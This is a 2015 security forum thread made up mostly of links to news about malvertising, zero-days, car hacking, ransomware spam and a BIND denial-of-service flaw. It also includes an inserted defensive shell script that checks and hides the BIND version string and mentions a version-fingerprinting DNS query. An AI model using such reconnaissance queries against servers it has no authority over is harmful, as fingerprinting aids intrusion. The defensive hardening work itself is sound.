https://blog.malwarebytes.org/social-engineering/2015/07/iloveyou-spam/?utm_source=Gplus&utm_medium=social
Concerning "flash" or anything else as far as that goes, "nothing gets fixed until it's broke".
-
Steer clear of low-tech hacks: How to keep your information safe
http://www.cnet.com/news/steering-clear-of-low-tech-hacks/
-
Mitnick proved that social engineering was and is an enormous threat and a prelude to all types of compromittal.
Getting uninformed, ignorant persons to tell details they should not share with anyone can mean the difference between a successful attack and a trial run. Re: http://wiki.cas.mcmaster.ca/index.php/The_Mitnick_attack
pol
-
What is "compromittal" ???
-
What is "compromittal" ???
That's what Bob meant... ;)
-
What is "compromittal" ???
That's what Bob meant... ;)
Creative use of the English language ;)
I believe it should be "a prelude to all types of compromise" ?
See http://www.tfd.com/Compromit on 'Compromit' which mentions compromise.
2. To put to hazard, by some indiscretion; to endanger; to compromise; as, to compromit the honor or the safety of a nation.
-
Could it be a committed compromise ??? :) :) :)
-
Or, compromise committed?
-
Online Cheating Site AshleyMadison Hacked
http://krebsonsecurity.com/2015/07/online-cheating-site-ashleymadison-hacked/
-
Online Cheating Site AshleyMadison Hacked
http://krebsonsecurity.com/2015/07/online-cheating-site-ashleymadison-hacked/
Time Magazine had a similar article http://time.com/3964059/ashley-madison-affair-adultery-infidelity-cheating-hack/?xid=tcoshare
-
Microsoft releases emergency patch for all versions of Windows
http://www.zdnet.com/article/microsoft-releases-emergency-patch-for-critical-windows-flaw/
-
Microsoft releases emergency patch for all versions of Windows
http://www.zdnet.com/article/microsoft-releases-emergency-patch-for-critical-windows-flaw/
Screenshot: http://www.screencast-o-matic.com/screenshots/u/Lh/1437422562314-27782.png
MS15-078: Vulnerability in Microsoft font driver could allow remote code execution: July 16, 2015
-
Tech Support Scams And The Blue Screen of Death
https://blog.malwarebytes.org/fraud-scam/2015/07/techsupportscams-and-the-blue-screen-of-death/?utm_source=Gplus&utm_medium=social
-
Hi DavidR and bob3160,
"Compromittal" is older English and is used here: Niles' Weekly Register: Containing Political, Political ..., Volume 32
"To avoid a compromittal of our neutrality" etc. etc. meaning a violation of sorts - compromise.
Mind that I am a Dutchman, not a native speaker...
polonus
-
Hi DavidR and bob3160,
"Compromittal" is older English and is used here: Niles' Weekly Register: Containing Political, Political ..., Volume 32
"To avoid a compromittal of our neutrality" etc. etc. meaning a violation of sorts - compromise.
Mind that I am a Dutchman, not a native speaker...
polonus
Considering that English is an additional language you seem to have mastered very well, an occasional
new word coming from you is understandable. If I were to attempt to write something in Dutch, I highly
doubt it would be as well constructed as your posts in English. :)
(I was just having a little fun. :) Please realize that little fact.)
-
Tech Support Scams And The Blue Screen of Death
https://blog.malwarebytes.org/fraud-scam/2015/07/techsupportscams-and-the-blue-screen-of-death/?utm_source=Gplus&utm_medium=social
Given the fact most people have their systems set to default BSOD settings where it appears and disappears in a flash, the full screen BSOD display window that does not disappear should stand out like a sore thumb.
-
Tech Support Scams And The Blue Screen of Death
https://blog.malwarebytes.org/fraud-scam/2015/07/techsupportscams-and-the-blue-screen-of-death/?utm_source=Gplus&utm_medium=social
Given the fact most people have their systems set to default BSOD settings where it appears and disappears in a flash, the full screen BSOD display window that does not disappear should stand out like a sore thumb.
What should stand out is the support telephone number at the bottom - which most certainly isn't on genuine BSOD screens.
-
I've never had a real BSOD appear inside the web browser..... ;D
-
I've never had a real BSOD appear inside the web browser..... ;D
Nor have I, but the later update (if you can call it that) goes full screen rather than be contained in a browser window.
-
Hackers take control of Jeep and crash it into ditch
https://www.youtube.com/watch?v=mwZMvi6nKvU
I think Avast should create an anti-virus software for transport vehicle, and it looks scary when a hacker can take full control of your vehicle you could end up in your own grave yard.
-
Here's some more about the Chrysler hacking...
http://www.wired.com/2015/07/patch-chrysler-vehicle-now-wireless-hacking-technique/
http://gizmodo.com/hackers-have-the-power-to-remotely-hijack-half-a-millio-1719233440
http://www.washingtonpost.com/news/morning-mix/wp/2015/07/22/car-hacking-just-got-real-hackers-disable-suv-on-busy-highway/
http://www.theglobeandmail.com/globe-drive/culture/technology/security-experts-hack-into-moving-car-turn-off-engine/article25625345/
-
Microsoft rushes emergency security fix for Windows
http://www.cnet.com/news/microsoft-rushes-emergency-security-fix-for-versions-of-windows/
WP-CLI Guide: Secure WordPress Backup and Update
https://blog.sucuri.net/2015/07/wp-cli-guide-secure-wordpress-backup-update.html?utm_campaign=WordPress&utm_medium=social&utm_source=googleplus&utm_term=wpcli
-
Could this be completely secure or is there a (hidden) backdoor somewhere?
GCHQ 's Communications and Electronics Security Group certified Samsung KNOX-platform for Samsung Galaxy S6 & S6 Edge.
Would you trust such a smartphone certified by British Intelligence or should we be somewhat aware of some hidden backdoor? Read: http://www.cesg.gov.uk/servicecatalogue/Product-Assurance/CPA/Pages/Samsung-Galaxy-S6-and-S6-Edge-Certification-Details.aspx
Other government institutions do the same: https://www.samsungknox.com/en/security-certifications#5
Seen to NSA's track record and recent revelations I would be a tad suspicious.
polonus
-
Could this be completely secure or is there a (hidden) backdoor somewhere?
GCHQ 's Communications and Electronics Security Group certified Samsung KNOX-platform for Samsung Galaxy S6 & S6 Edge.
Would you trust such a smartphone certified by British Intelligence or should we be somewhat aware of some hidden backdoor? Read: http://www.cesg.gov.uk/servicecatalogue/Product-Assurance/CPA/Pages/Samsung-Galaxy-S6-and-S6-Edge-Certification-Details.aspx
Other government institutions do the same: https://www.samsungknox.com/en/security-certifications#5
Seen to NSA's track record and recent revelations I would be a tad suspicious.
polonus
I would trust it as much as I would trust a phone certified by the NSA. :) :o
-
Hi bob3160,
Me too, I just only reported what info I found online. I think our whole security situation on the Internet and via the "Internet of things" is not what it should be or rather what it could be and political incompetence to understand where this all leads to or could lead to is not helping either.
Damian
-
Zero-Day Flaws Found in Internet Explorer, Everyone Advised to Stop Using the Browser
http://news.softpedia.com/news/zero-day-flaws-found-in-internet-explorer-everyone-advised-to-stop-using-the-browser-487592.shtml
-
Facebook Marketing, A New Method for Scammers?
https://blog.malwarebytes.org/fraud-scam/2015/07/facebook-marketing-a-new-method-for-scammers/?utm_source=Gplus&utm_medium=social
Fake jQuery Scripts in Nulled WordPress Plugins
https://blog.sucuri.net/2015/05/fake-jquery-scripts-in-nulled-wordpress-pugins.html?utm_campaign=Fake%20jQuery%20Scripts%20in%20Nulled%20WordPress%20Plugins%20Blogpost&utm_medium=social&utm_source=googleplus
-
Malicious Google Analytics Referral Spam
https://blog.sucuri.net/2015/07/malicious-google-analytics-referral-spam.html?utm_campaign=Malicious%20Google%20Analytics%20Referral%20Spam%20Blogpost&utm_medium=social&utm_source=googleplus
Privilege escalation vulnerability found in OS X
https://blog.malwarebytes.org/mac/2015/07/privilege-escalation-vulnerability-found-in-os-x/?utm_source=Gplus&utm_medium=social
This is partly informative and advertising! But you will get the message.
Scroll down for the video https://sucuri.net/website-firewall/ddos-protection?utm_campaign=DDoS&utm_medium=social&utm_source=googleplus
-
Some explain it as awesome and cool and others call it the scariest feature of Google they'd ever seen - it is called Your Timeline.
Read: http://google-latlong.blogspot.nl/2015/07/your-timeline-revisiting-world-that.html
Link author: Gerard Sanz, Product Manager.
They say: "Your Timeline is private and visible only to you; and you control the locations you choose to keep".
I'd wonder if Big Brother is not also aware of all my geo-location timeline,
and I very much doubt Big Brother is not fully aware.
polonus
-
Some explain it as awesome and cool and others call it the scariest feature of Google they'd ever seen - it is called Your Timeline.
Read: http://google-latlong.blogspot.nl/2015/07/your-timeline-revisiting-world-that.html
Link author: Gerard Sanz, Product Manager.
They say: "Your Timeline is private and visible only to you; and you control the locations you choose to keep".
I'd wonder if Big Brother is not also aware of all my geo-location timeline,
and I very much doubt Big Brother is not fully aware.
polonus
It's scary but the Timeline feature in Facebook is even more scary.
It's easy to see what's kept me busy today:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1437686076886-18488.png)
-
Because of four zero-days now in the open in IE and MS not meeting the deadline
better refrain from using Blue E for the moment until patched.:
http://www.zerodayinitiative.com/advisories/ZDI-15-359/ & http://www.zerodayinitiative.com/advisories/ZDI-15-360/
& http://www.zerodayinitiative.com/advisories/ZDI-15-361/
polonus
-
SweetCaptcha Returns Hijacking Another Plugin
https://blog.sucuri.net/2015/07/sweetcaptcha-returns-hijacking-another-plugin.html?utm_campaign=SweetCaptcha%20Returns%20Hijacking%20Another%20Plugin%20Blogpost&utm_medium=social&utm_source=googleplus
Twitch “Audio Fix” Hijacks Stream Key
https://blog.malwarebytes.org/fraud-scam/2015/07/twitch-audio-fix-hijacks-stream-key/?utm_source=Gplus&utm_medium=social
-
Because of four zero-days now in the open in IE and MS not meeting the deadline
better refrain from using Blue E for the moment until patched.:
http://www.zerodayinitiative.com/advisories/ZDI-15-359/ & http://www.zerodayinitiative.com/advisories/ZDI-15-360/
& http://www.zerodayinitiative.com/advisories/ZDI-15-361/
polonus
...vulnerabilities reported by ZDI have already been fixed in bulletins MS14-037 on July 8, 2015 and MS15-018 on March 10, 2015...
-
Cybercriminal's favorite exploit kit by far is named Angler:
Angler dominated with an 82% of the exploit kit market share - https://blogs.sophos.com/2015/07/21/a-closer-look-at-the-angler-exploit-kit/ link article author = Fraser Howard.
Qualities of this malware: http://blogs.cisco.com/security/talos/angler-domain-shadowing
Link article author is Nick Biasini and edited by Joel Esler.
posted here by polonus
-
Security Researchers wary of Wassenaar Treaty. Discriminating export restrictions could severely hamper international digital security. Lobbyists and non-technical political forces could have clipped the wings of security researchers and could have hampered security for the global community and especially outside the "Wassenaar Global Empire" with the proposals as they are now for CFAA.
What does it bring if you have a computer with a Tb of memory and you cannot work it because of the slow Celeron processor it has inside, you'd better have a swift processor on a computer with an external hard disk?
Or what if you run privacy risks in parts of the world because of encryption export restrictions, even worse if by technical incompetence the encryption is served the wrong end up.
It is like old Rome revisited, the Romans were producing cheese with the use of rennet and Germanic/Slavonic tribes outside the limes (boundaries) of the empire made their "ost"/"ser" by passing milk through nets made of the Galium plant, also known as catchweed or goosegrass; later they adopted the new Roman ways of life and produced real cheese (word taken from Latin caseus). With Wassenaar rules "caseus" would never have been exported. Now we even produce kosher and halal cheese.
Read here: https://threatpost.com/security-researchers-wary-of-proposed-wassenaar-rules/112937 Article author = Michael Mimoso.
polonus
-
Leaked files from state-sponsored hackers reveal which protection their trojans can’t get past
Data breaches on international surveillance firms can teach us a lot about which antivirus programs are actually working.
Recent high-profile leaks show that malware from surveillance firms Hacking Team and FinFisher can't be detected by more than 80% of antivirus programs!
http://blog.emsisoft.com/2015/07/27/leaked-files-from-state-sponsored-hackers-reveal-which-protection-their-trojans-cant-get-past/?ref=ticker150727&utm_source=newsletter&utm_medium=newsletter&utm_content=blog&utm_campaign=ticker150727
Hacking Team’s trojan detected by 5 out of 34 antivirus vendors
http://ht.transparencytoolkit.org/KnowledgeBase/-%20AV%20Test%20Summary%20-%20%5DHT%5B%20%3A%3A%20KnowledgeBase%20Product.html
-
Hi dear avast users,
10 million potential victims of malverting leading to Angler exploit infections.
Read: http://www.cyphort.com/malvertising-spike/ link article author = Nick Bilogorskiy.
Malvertising via -ads.us.e-planning.net is being blocked for me by uBlock Origin.
Users should always have protection via a decent adblocker.
Understand that using adblockers is a vital part of your protection.
"Do not surf without being protected, else you will surely get infected". ;D
polonus
-
The Home Office warns against TorrentLocker-ransomware with an additional advice to use HTTPS only: https://www.gov.uk/government/news/home-office-fraudulent-email-warning
polonus
-
Quantserve trackers and adware pushers use soup. It is a soup whose taste I do not like and why I have an adblocker like uBlock Origin to keep such destinations blocked. See what visitor related info is gathered via soup.
Results from scanning URL: httc://edge.quantserve.com/quant.js
window.SOUP_test_ab = "";
Visitor related
Login status of the user - all following flags apply to a logged in visitor (= Soup user) only
Blog privacy - the privacy status the visitor configured for their blog
NSFW toggle - this pertains to an upcoming release that let's the visitor toggle if they want to see NSFW material in /everyone, /friends etc.
Exports - tells us which exports the visitor has configured (currently this can only be facebook)
Reported someone - did the visitor report posts for anything, like spam. This may pertain to the visitors engagement level.
Email - did the visitor supply an email with their registration?
Which imports did the visitor configure?
Did the visitor connect their account to facebook, either via export or signup?
How long has the visitor had his account with Soup, in days
Which pool does the visitor belong to? Currently there is only A, which are all members of @testkitchen, and B, which is the default for everyone. We may use this to do split-testing in the future.
Is the visitor using an adblocker?
How many feeds is the visitor importing to their blog?
How many original (non-imported) posts does the visitor have on their blog?
Days since the last original post of the visitor
Number of groups the visitor is member of
polonus
-
The Home Office warns against TorrentLocker-ransomware with an additional advice to use HTTPS only: https://www.gov.uk/government/news/home-office-fraudulent-email-warning
polonus
Timely warning notification there. I'm sure avast will have protection soon.
-
Update on Rowhammer:
http://www.slate.com/articles/technology/bitwise/2015/07/rowhammer_security_exploit_why_a_new_security_attack_is_truly_terrifying.html
Earlier post (March 2015) by Pondus here:
https://forum.avast.com/index.php?topic=52252.msg1192762#msg1192762
(EDIT: Corrected year to 2015)
-
Advert Strikes Out Via Copycat Gaming Site
https://blog.malwarebytes.org/malvertising-2/2015/07/advert-strikes-out-via-copycat-gaming-site/?utm_source=Gplus&utm_medium=social
Ukrainian Media Site RBC[dot]UA Drops CryptoWall Ransomware
https://blog.malwarebytes.org/exploits-2/2015/07/ukrainian-media-site-rbcdotua-drops-cryptowall-ransomware/?utm_source=Gplus&utm_medium=social
Fake Safari update installs MacKeeper, ZipCloud
https://blog.malwarebytes.org/fraud-scam/2015/07/fake-safari-update-installs-mackeeper-zipcloud/?utm_source=Gplus&utm_medium=social
-
Malwarebytes Anti-Malware Now Supports Windows 10 (Not surprising.)
https://blog.malwarebytes.org/news/2015/07/malwarebytes-anti-malware-now-supports-windows-10/?utm_source=Gplus&utm_medium=social
USA TODAY Fantasy Sports Discussion Forum Serves Malware
https://blog.malwarebytes.org/exploits-2/2015/07/usa-today-fantasy-sports-discussion-forum-serves-malware/?utm_source=Gplus&utm_medium=social
-
How your privacy has been thrown out of the window on Google Android:
http://arstechnica.com/gadgets/2013/10/googles-iron-grip-on-android-controlling-open-source-by-any-means-necessary/
That was written in 2013 and the situation has only grown worse with adblockers taken from Google Shop etc. etc.
polonus
-
BIND users should immediately upgrade - there is no circumventing this; the vulnerability can be easily attacked by exploit kits.
Read: https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/ posted by Michael McNally
This general bug could mean a big problem when not patched.
polonus
-
Defeating The Fake iOS Crash Reports
https://blog.malwarebytes.org/fraud-scam/2015/07/defeating-the-fake-ios-crash-reports/?utm_source=Gplus&utm_medium=social
-
BIND9 – Denial of Service Exploit in the Wild
https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html?utm_campaign=BIND9%20%E2%80%93%20Denial%20of%20Service%20Exploit%20in%20the%20Wild%20Blogpost&utm_medium=social&utm_source=googleplus
-
Cybercriminals planning future attacks preying on existing vulnerabilities:
http://www.net-security.org/secworld.php?id=18691
For instance: https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061
Shellshock or Bashdoor: https://en.wikipedia.org/wiki/Shellshock_(software_bug)
Reconnaissance attack tools: http://www.sans.org/reading-room/whitepapers/tools/tools-tools-tools-406
(P.S. Use of such tools could be offensive, restricted and under circumstances illegal - )
polonus
-
Don't fall for this email:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1438634737382-33018.png)
The attachment will not update your system to Windows 10
The attachment will Encrypt the information on your Computer.
It will cost you money to get the key to un-encrypt the files.
More information at:
http://blogs.cisco.com/security/talos/ctb-locker-win10
-
Apple iTunes & AppStore - Persistent Invoice Vulnerability
http://www.vulnerability-lab.com/get_content.php?id=1512
-
Why adblocking stays your best line of defense against malvertising campaigns, read: https://blog.malwarebytes.org/malvertising-2/2015/08/large-malvertising-campaign-takes-on-yahoo/
Yahoo together with other big companies is working on a better ad experience ;) (ironical wink)
polonus
-
Why adblocking stays your best line of defense against malvertising campaigns, read: https://blog.malwarebytes.org/malvertising-2/2015/08/large-malvertising-campaign-takes-on-yahoo/
Yahoo together with other big companies is working on a better ad experience ;) (ironical wink)
polonus
Yep, there is no such thing as a 'better ad experience' other than removing them ;)
-
Chinese Commercial VPN service makes use of hacked Windows servers abroad: https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/
The main reason for the brute force attacks, disabling of the firewall and windows defender - 31 hacked Windows servers were detected. The main reason for the hacks could be it was cost saving.
polonus
-
But American VPN to China is also not very secure: https://www.goldenfrog.com/vyprvpn/features/vpn-server-locations
-> http://toolbar.netcraft.com/site_report?url=https://www.goldenfrog.com dns report: http://www.dnsinspect.com/datafoundry.com/1438711068 nameserver version info proliferation turns up moderate bind security: https://www.redhat.com/archives/rhsa-announce/2014-January/msg00013.html caching only Bind server.
Bind
To hide the version when using Bind, open the named.conf configuration file using your favorite editor, go to the options section and set a custom version string using the version option. So goldenfrog already has some rust.
polonus
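As an added example (not part of the forum post above, and not goldenfrog's configuration): a small shell audit that checks whether a named.conf overrides the BIND version string in its options block, and rewrites a weak configuration with a custom version string. The sample named.conf is constructed for this demonstration; the check is the defender's counterpart of the nameserver version proliferation mentioned in the post.

```shell
#!/bin/sh
# Added example: audit a BIND named.conf for a custom "version" string in the
# options block, then produce the hardened form. The sample config below is
# constructed; it is not a real server's configuration.

# Returns 0 (true) when the options { } block contains a version directive.
bind_has_version_option() {
    # $1 = path to named.conf
    awk '
        /^[[:space:]]*options[[:space:]]*[{]/ { inopt=1 }
        inopt && /^[[:space:]]*version[[:space:]]+"/ { found=1 }
        inopt && /^[[:space:]]*[}];/ { inopt=0 }
        END { exit found ? 0 : 1 }
    ' "$1"
}

# Print the named.conf with a version string inserted right after the
# opening "options {" line (only the first options block is touched).
bind_harden_version() {
    # $1 = path to named.conf, $2 = replacement version string
    awk -v ver="$2" '
        { print }
        /^[[:space:]]*options[[:space:]]*[{]/ && !done {
            print "    version \"" ver "\";"
            done=1
        }
    ' "$1"
}

# Human-readable verdict for one configuration file.
bind_check_report() {
    if bind_has_version_option "$1"; then
        echo "OK: version string is overridden in $1"
    else
        echo "WARN: $1 reveals the real BIND version to a 'dig version.bind txt chaos' query"
    fi
}

# Constructed sample: a caching-only resolver with no version option.
WEAK_CONF=$(mktemp)
cat > "$WEAK_CONF" <<'EOF'
options {
    directory "/var/cache/bind";
    recursion yes;
    allow-query { localhost; 192.0.2.0/24; };
};
EOF

# Hardened copy with the version string replaced by a neutral text.
HARDENED_CONF=$(mktemp)
bind_harden_version "$WEAK_CONF" "not disclosed" > "$HARDENED_CONF"

bind_check_report "$WEAK_CONF"
bind_check_report "$HARDENED_CONF"
```

Hiding the version string only removes one easy fingerprint; it is no substitute for applying the BIND updates discussed elsewhere in this thread.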
-
Large Malvertising Campaign Takes on Yahoo!
https://blog.malwarebytes.org/malvertising-2/2015/08/large-malvertising-campaign-takes-on-yahoo/?utm_source=Gplus&utm_medium=social
DYLD_PRINT_TO_FILE exploit found in the wild
https://blog.malwarebytes.org/mac/2015/08/dyld_print_to_file-exploit-found-in-the-wild/?utm_source=Gplus&utm_medium=social
-
Researcher says he can hack GM’s OnStar app, open vehicle, start engine
http://venturebeat.com/2015/07/30/researcher-says-can-hack-gms-onstar-app-open-vehicle-start-engine/
-
Advice from Perry Mertens to uninstall NETBIOS, a protocol dating back to 1983.
Read: https://www.linkedin.com/pulse/netbios-30-years-old-forgotten-backdoor-microsoft-windows-mertens
The vulnerability problems of NETBIOS: https://technet.microsoft.com/en-us/library/security/ms00-047.aspx
Earlier we got the same advice here: https://isc.sans.edu/diary/Is+it+time+to+get+rid+of+NetBIOS%3F/12454
polonus
-
Advice from Perry Mertens to uninstall NETBIOS, a protocol dating back to 1983.
Read: https://www.linkedin.com/pulse/netbios-30-years-old-forgotten-backdoor-microsoft-windows-mertens
The vulnerability problems of NETBIOS: https://technet.microsoft.com/en-us/library/security/ms00-047.aspx
Earlier we got the same advice here: https://isc.sans.edu/diary/Is+it+time+to+get+rid+of+NetBIOS%3F/12454
polonus
Affected Software:
Microsoft Windows NT 4.0 Workstation
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Enterprise Edition
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Microsoft Windows 2000
-
What does a DDoS attack look like?
https://www.youtube.com/watch?utm_campaign=What%20does%20a%20DDoS%20attack%20look%20like%20YouTube%20Video&utm_medium=social&utm_source=googleplus&v=w-I19knBFTM
-
“Thunderstrike 2” rootkit uses Thunderbolt accessories to infect Mac firmware
http://arstechnica.com/apple/2015/08/thunderstrike-2-rootkit-uses-thunderbolt-accessories-to-infect-mac-firmware/
-
0-day bug in fully patched OS X comes under active exploit to bypass password protection
http://arstechnica.com/security/2015/08/0-day-bug-in-fully-patched-os-x-comes-under-active-exploit-to-hijack-macs/
-
Read: http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed
polonus
-
Read: http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed
polonus
Bad Google at it again. :) :) :)
-
Read: http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed
polonus
Bad Google at it again. :) :) :)
Umm, what about sneaky Chrome installs, like pre-checked opt-in options. I wonder who that is, just had an offer again for Chrome and it's a free download. Strange when it is free already.
-
Read: http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed
polonus
Bad Google at it again. :) :) :)
Umm, what about sneaky Chrome installs, like pre-checked opt-in options. I wonder who that is, just had an offer again for Chrome and it's a free download. Strange when it is free already.
Doesn't look like that message is coming from Google ???
-
Read: http://www.cio.com.au/article/581435/google-puts-screws-sneaky-chrome-add-on-installs/?utm_medium=rss&utm_source=taxonomyfeed
polonus
Bad Google at it again. :) :) :)
Umm, what about sneaky Chrome installs, like pre-checked opt-in options. I wonder who that is, just had an offer again for Chrome and it's a free download. Strange when it is free already.
Doesn't look like that message is coming from Google ???
I know it was a back handed reference to avast installing it (default opt-in) for the unwary.
Followed with avast pushing it hard in the popup ads, even though in my settings I have the 'Do not use Chrome as Avast default browser.' I thought they would get the message that way.
-
@David,
Some of us do use Chrome as our default browser.
When I upgraded one of the systems to Windows 10, I was actually happy to see the Chrome recommendation. :)
-
@David,
Some of us do use Chrome as our default browser.
When I upgraded one of the systems to Windows 10, I was actually happy to see the Chrome recommendation. :)
Yes they do and that is their choice, but I tire of having it rammed down my throat at every opportunity.
-
If you're using Firefox make sure you're using version 39 or later.
If you haven't updated, this is waiting for you:
https://billmullins.wordpress.com/2015/08/07/tech-thoughts-net-news-friday-edition-august-7-2015/
-
If you're using Firefox make sure you're using version 39 or later.
If you haven't updated, this is waiting for you:
https://billmullins.wordpress.com/2015/08/07/tech-thoughts-net-news-friday-edition-august-7-2015/
According to another link on that page it should be Firefox version 39.0.3 (released through FF auto update if you haven't disabled it) that fixes this vulnerability not just 39.0.
-
Who’s Behind Your Proxy? Uncovering Bunitu’s Secrets
https://blog.malwarebytes.org/botnets/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/?utm_source=Gplus&utm_medium=social
Chinese Actors Copy and Paste HackingTeam Zero-Days in Site Hack
https://blog.malwarebytes.org/exploits-2/2015/08/chinese-actors-copy-and-paste-hackingteam-zero-days-in-site-hack/?utm_source=Gplus&utm_medium=social
Fake jQuery Scripts in Nulled WordPress Plugins
https://blog.sucuri.net/2015/05/fake-jquery-scripts-in-nulled-wordpress-pugins.html?utm_campaign=Fake%20jQuery%20Scripts%20in%20Nulled%20WordPress%20Plugins%20Blogpost&utm_medium=social&utm_source=googleplus
“Payment Confirmation Slip” Spam Offers Up Malware
https://blog.malwarebytes.org/online-security/2015/08/payment-confirmation-slip-spam-offers-up-malware/
The Dynamics of Passwords (This one is one everyone should read)
https://blog.sucuri.net/2015/02/the-history-of-passwords.html?utm_campaign=The%20Dynamics%20of%20Passwords%20Blogpost&utm_medium=social&utm_source=googleplus
One good password checker is... How Secure Is my Password (https://howsecureismypassword.net/)
Ask Sucuri: How did my WordPress Website get Hacked? – A Tutorial
https://blog.sucuri.net/2015/08/ask-sucuri-how-did-my-wordpress-website-get-hacked-a-tutorial.html?utm_campaign=Ask%20Sucuri%3A%20How%20did%20my%20WordPress%20Website%20get%20Hacked%3F%20%E2%80%93%20A%20Tutorial&utm_medium=social&utm_source=googleplus
edit: typo
-
Critical patch for firefox, please update: http://www.scmagazine.com/mozilla-issues-new-firefox-version/article/431575/?utm_source=dlvr.it&utm_medium=twitter
Patch repaired unauthorized access to device data through the USB interface.
Shadow IT worse than ever thought - the best approach is the “Five D’s”: Discover, Defend, Destroy, Develop and Discuss
quote taken from XO Communications’ John Grady - read: http://www.itbusinessedge.com/blogs/infrastructure/shadow-it-worse-than-we-thought.html
polonus
-
Critical patch for firefox, please update: http://www.scmagazine.com/mozilla-issues-new-firefox-version/article/431575/?utm_source=dlvr.it&utm_medium=twitter
Patch repaired unauthorized access to device data through the USB interface.
Shadow IT worse than ever thought - the best approach is the “Five D’s”: Discover, Defend, Destroy, Develop and Discuss
quote taken from XO Communications’ John Grady - read: http://www.itbusinessedge.com/blogs/infrastructure/shadow-it-worse-than-we-thought.html
polonus
https://forum.avast.com/index.php?topic=52252.msg1241022#msg1241022
-
Hi bob3160,
Sorry for the duplicate on the firefox update, now no-one can say they haven't seen it. The second one is new here.
Damian
-
http://www.bit-tech.net/news/hardware/2015/08/07/x86-security-flaw/1
https://www.blackhat.com/docs/us-15/materials/us-15-Domas-The-Memory-Sinkhole-Unleashing-An-x86-Design-Flaw-Allowing-Universal-Privilege-Escalation-wp.pdf
https://www.blackhat.com/docs/us-15/materials/us-15-Domas-The-Memory-Sinkhole-Unleashing-An-x86-Design-Flaw-Allowing-Universal-Privilege-Escalation.pdf
https://github.com/xoreaxeaxeax/sinkhole
:o ::) :-\ :'(
0day in hardware for 20 years ;)
-
Hi Dwarden,
And who would profit from a 20 year existing zero day?
Answer the questions and you know why they sit on most backdoors that long
and why lots of protocols stay holed, flawed, degraded in many ways for years
and even come under export restrictions?
polonus
-
Stagefright Detector Detects if Your Phone Is Vulnerable to Stagefright
http://lifehacker.com/stagefright-detector-detects-if-your-phone-is-vulnerabl-1722662061
-
Google Is Now Alphabet. Here’s Why It Had to Evolve.
http://www.slate.com/blogs/future_tense/2015/08/10/google_becomes_alphabet_page_brin_form_new_company_pichai_new_google_ceo.html
-
Sony not ready for Windows10 transition: http://www.sony.co.uk/support/en/windows10
polonus
-
Google Is Now Alphabet. Here’s Why It Had to Evolve.
http://www.slate.com/blogs/future_tense/2015/08/10/google_becomes_alphabet_page_brin_form_new_company_pichai_new_google_ceo.html
Google is still Google but Google is now a subsidiary of Alphabet.
-
Watch out for Costly Mobile Ads
https://blog.malwarebytes.org/online-security/2015/08/watch-out-for-costly-mobile-ads/?utm_source=Gplus&utm_medium=social
New Firefox Zero-Day: Patch Now! (UPDATED) (Updated August 11, 2015)
https://blog.malwarebytes.org/zero-days/2015/08/new-firefox-zero-day-patch-now/?utm_source=Gplus&utm_medium=social
-
Hacking a Tesla Model S: What we found and what we learned
https://blog.lookout.com/blog/2015/08/07/hacking-a-tesla/
-
Watson to Gain Ability to “See”
http://www-03.ibm.com/press/us/en/pressrelease/47435.wss
HAL 9000 https://en.wikipedia.org/wiki/HAL_9000
-
Lenovo installed BIOS-rootkit on laptops: http://thenextweb.com/insider/2015/08/12/lenovo-used-a-hidden-windows-feature-to-ensure-its-software-could-not-be-deleted/
polonus
-
Facebook urged to tighten privacy settings after harvest of user data
http://www.theguardian.com/technology/2015/aug/09/facebook-privacy-settings-users-mobile-phone-number
-
New SMiShing Campaign Targets T-Mobile Subscribers
https://blog.malwarebytes.org/fraud-scam/2015/08/new-smishing-campaign-targets-t-mobile-subscribers/?utm_source=Gplus&utm_medium=social
FAQs about Mac Adware
https://www.malwarebytes.org/articles/faqs-about-mac-adware/?utm_source=Gplus&utm_medium=social
My Conversations with Cybersecurity Influencers
https://blog.malwarebytes.org/conferences/2015/08/my-conversations-with-cybersecurity-influencers/?utm_source=Gplus&utm_medium=social
Websites Hacked Via Website Backups
https://blog.sucuri.net/2015/06/websites-hacked-via-website-backups.html?utm_campaign=Websites%20Hacked%20Via%20Website%20Backups%20Blogpost&utm_medium=social&utm_source=googleplus
Steam IM Spam Leads to Fake Imgur Site, Malware
https://blog.malwarebytes.org/fraud-scam/2015/08/steam-im-spam-leads-to-fake-imgur-site-malware/?utm_source=Gplus&utm_medium=social
SSL Malvertising Campaign Continues
https://blog.malwarebytes.org/malvertising-2/2015/08/ssl-malvertising-campaign-continues/?utm_source=Gplus&utm_medium=social
The Noise Around You Could Strengthen Your Passwords
http://www.wired.com/2015/08/noise-around-strengthen-passwords/
-
Eurocentric Ransomware Spam in Circulation
https://blog.malwarebytes.org/fraud-scam/2015/08/eurocentric-ransomware-spam-in-circulation/?utm_source=Gplus&utm_medium=social
Outbrowse and other bundlers
https://blog.malwarebytes.org/security-threat/2015/08/outbrowse-and-other-bundlers/?utm_source=Gplus&utm_medium=social (Another reason to always do custom installs and read each screen carefully.)
-
MRG Effitas Online Banking/Browser Security Q2 2015
Saw this on Wilders Forum
http://www.wilderssecurity.com/threads/mrg-effitas-online-banking-browser-security-q2-2015.378862/
-
Firefox users exercise caution http://betanews.com/2015/08/15/firefox-stealthily-loads-webpages-when-you-hover-over-links-heres-how-to-stop-it/
-
Firefox users exercise caution http://betanews.com/2015/08/15/firefox-stealthily-loads-webpages-when-you-hover-over-links-heres-how-to-stop-it/
Thanks, but I already fixed this in Firefox, Cyberfox and Pale Moon.
http://www.ghacks.net/2015/08/16/block-firefox-from-connecting-to-sites-when-you-hover-over-links/
-
